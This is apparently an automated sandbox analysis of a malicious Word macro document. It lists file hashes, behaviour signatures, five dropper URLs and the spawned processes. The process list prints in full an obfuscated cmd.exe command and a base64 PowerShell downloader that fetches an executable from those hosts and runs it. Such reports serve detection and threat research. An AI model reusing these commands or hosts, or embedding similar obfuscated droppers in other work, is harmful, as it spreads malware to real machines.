Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
31-05-2024 17:47
General
-
Target
87cf239da2f6be707863119899a51869_JaffaCakes118.doc
-
Size
88KB
-
MD5
87cf239da2f6be707863119899a51869
-
SHA1
82ff49eea53759f63a03b90a73a152fd8c207bde
-
SHA256
63e1718a3b4d658a1672e24c081e36dd42bcaa74f03db39621afb7470822a28d
-
SHA512
e18cbdec3730e10cc0899853ba9369dc86d556559a037fe7c61234679a009da8c2d5c8621bd34f0a06e1d042b48719727529e1653a08d2e5ad49102aca12d8d6
-
SSDEEP
768:zpJcaUitGAlmrJpmxlzC+w99NB++1ouFqKKLHSsm8eeOuGyUy/PjbfydIW0K+U:zptJlmrJpmxlRw99NB++auk0kHDvuW
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://yurystvpolshi.pl/12127D
exe.dropper
http://finansvekredi.com/E
exe.dropper
http://www.she-wolf.eu/vs4WT
exe.dropper
http://sunflowerschoolandcollege.com/wordpress/FQ8NEHLV
exe.dropper
http://bucakservisciler.com/dQcPfG
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 31 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\87cf239da2f6be707863119899a51869_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Windows\SysWOW64\Cmd.exeCmd /V^:^O/C"^s^e^t n^1^fV=^=^=A^A^gAAIA^AC^Ag^A^A^IA^AC^A^g^AA^I^A^ACA^gAA^IA^ACA^gA^A^I^AACAg^A^AIA^0^H^A^9Bw^eA^gG^AjBA^dA^EG^AjBQf^A^s^D^Ar^BQ^Y^A^U^G^A^y^Bg^YA^s^DAJB^g^b^AoG^A^kAA^I^A0GAl^B^A^d^A^kE^A^t^AQ^ZAsG^AvBg^dA^4GAJ^Bw^O^AkCA^JB^gbA^oG^A^k^A^A^I^A^wC^A^1B^w^Y^A^UE^Ak^A^A^KAU^G^As^BQ^a^AY^E^Ak^BQYA8GA^s^B^g^bAcH^AvBARA^4C^AEBwdAYF^A^kA^w^eAkHAy^B^A^dAsHA^p^AgRA^w^EAE^BA^JA^AC^A^u^B^Q^aA^ACA^1^Bw^Y^A^U^EA^k^A^A^K^AgG^A^j^BQ^YA^U^G^AyBw^bAYG^A^7A^w^JA^U^G^A4B^Q^ZA^4C^AnA^wK^A8^E^A0B^g^bA^QC^Ar^A^w^JA^wF^AnAwK^AMGA^p^B^A^b^AI^G^A^1^BAcAo^D^A2BgbAUGA^kA^Q^P^Ak^EAuBg^a^AQCA7A^wJ^A^gDAyA^Q^MAcCA^gAQ^PAACA^PBA^dA4^GAkA^wO^AkC^AnAAQ^AcCAoAAdA^kG^As^BAc^AM^FA^uAw^JAc^E^Am^BA^U^A^MG^ARB^AZ^A8C^AtB^wb^A^MG^A^uA^gcA^U^G^A^sBQ^aA^MG^Az^B^QaAYHA^y^BQZAMHArB^Q^YA^M^GA1B^g^Y^A^8CAv^A^g^O^AA^HA0B^Ad^Ag^GA^A^BgV^Aw^E^AI^BQRA^4E^A4A^QUA^Y^E^AvAwc^AMH^Al^BgcAAHAkB^gcA^8^GA^3^B^w^LA^0^GAv^Bw^Y^A^4CAl^B^wZ^A^U^GAsB^A^b^A^8GAjBA^Z^A4^GA^h^BA^bA8^G^AvBA^a^AM^GAzB^gcA^UGA3B^w^bAw^G^Am^BgbAU^H^A^zB^w^LA^8CA^6^AAcAQHA^0^BAaA^A^EAUB^wVA^QDA^zB^gd^A8CA1B^QZ^A^4C^A^m^B^AbA8GA^3^B^QLA^U^GAoB^wc^A4C^A3B^wdAc^H^AvA^w^L^AoD^A^w^B^A^dAQ^HA^o^B^A^QAUE^AvA^Q^bA8^GA^j^B^g^L^AkGA^kB^QZAIH^ArB^QZAYH^A^z^B^g^bA^EGAu^B^Q^aAY^G^Av^A^wLAo^DA^w^B^Ad^A^Q^H^A^oBA^Q^AQEA3A^gMAE^DAyAQ^MA^8CA^s^B^Ac^A4CAp^BA^a^A^M^HAs^B^wb^A^A^H^A^2^B^A^dAM^HA5^B^gcAU^HA5^B^wLA^8CA^6^A^Ac^A^Q^HA^0BA^aAcCA9A^gR^A^w^E^AE^B^AJ^As^D^A0^B^g^bA^UG^A^pBA^bAMEAi^B^QZ^AcFA^uAAdAUGAO^BA^I^A^Q^HAj^B^Q^ZA^oG^AiB^w^b^A^0CA3^B^Q^ZA4GA9^A^AR^Ac^HAW^B^AJ ^e^- ^ll^eh^sr^e^w^op&&^f^or /^L %^9 ^in (1^021^;-^1^;0)^d^o ^s^et R^my=!R^my!!n^1^fV:~%^9,1!&&i^f %^9 e^q^u ^0 ca^l^l %R^my:~^-1^02^2%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e JABWAHcARAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABEAEwARgA9ACcAaAB0AHQAcAA6AC8ALwB5AHUAcgB5AHMAdAB2AHAAbwBsAHMAaABpAC4AcABsAC8AMQAyADEAMgA3AEQAQABoAHQAdABwADoALwAvAGYAaQBuAGEAbgBzAHYAZQBrAHIAZQBkAGkALgBjAG8AbQAvAEUAQABoAHQAdABwADoALwAvAHcAdwB3AC4AcwBoAGUALQB3AG8AbABmAC4AZQB1AC8AdgBzADQAVwBUAEAAaAB0AHQAcAA6AC8ALwBzAHUAbgBmAGwAbwB3AGUAcgBzAGMAaABvAG8AbABhAG4AZABjAG8AbABsAGUAZwBlAC4AYwBvAG0ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAEYAUQA4AE4ARQBIAEwAVgBAAGgAdAB0AHAAOgAvAC8AYgB1AGMAYQBrAHMAZQByAHYAaQBzAGMAaQBsAGUAcgAuAGMAbwBtAC8AZABRAGMAUABmAEcAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAG4AdABPACAAPQAgACcAMQAyADgAJwA7ACQAagBuAEkAPQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAbgB0AE8AKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEUAYwB1ACAAaQBuACAAJABEAEwARgApAHsAdAByAHkAewAkAFYAdwBEAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUAYwB1ACwAIAAkAGoAbgBJACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAGoAbgBJADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5e36586845fe627ecf3eeafa9944bee38
SHA100d7288ec7dd96f59d74bc2a1d123fe5eed69767
SHA256ff74e62c0d218f79504195aba1eebee94eeacc8dbf65ed1c97c926fc4aed25a6
SHA512975a3f499d67c29a0e0d1f9fc62a9bca70131cf1b1d5d7e7a9c95c950a338fe837a13ca0e0c8972df728e0ddd1d5ca2ba6c7edbd2518d043f8fb124907a2680f
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
4KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
44KB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
1024KB